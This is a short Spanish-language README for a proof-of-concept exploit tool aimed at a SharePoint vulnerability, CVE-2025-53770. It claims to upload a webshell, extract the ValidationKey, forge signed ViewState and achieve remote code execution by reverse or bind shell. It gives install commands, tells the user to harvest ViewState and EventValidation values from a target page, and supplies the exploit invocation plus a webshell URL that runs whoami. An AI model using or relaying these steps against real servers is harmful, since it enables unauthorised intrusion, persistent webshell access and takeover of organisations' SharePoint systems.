
PoC de explotación para CVE-2025-53770 que permite la carga de webshell en SharePoint, extracción de ValidationKey, generación de ViewState firmado y ejecución remota de código mediante shell reversa o bind shell.
Este paquete permite:
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt
Subir la webshell
Desde una página de SharePoint puedes acceder al código fuente de la página. Simplemente ve a la pestaña de ver fuente y desde allí, si está disponible, obtendrías lo siguiente, que puedes copiar:
A) __VIEWSTATEGENERATOR
B) __EVENTVALIDATION
C) (cualquier __VIEWSTATE actual para contexto)
python3 toolshell_exploit.py \
--target https://sharepoint.local \
--viewstate "<any_BASE64_VIEWSTATE>" \
--generator "<VIEWSTATEGENERATOR>" \
--eventval "<EVENTVALIDATION>"
Esto sube spinstall0.aspx. Verificar: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami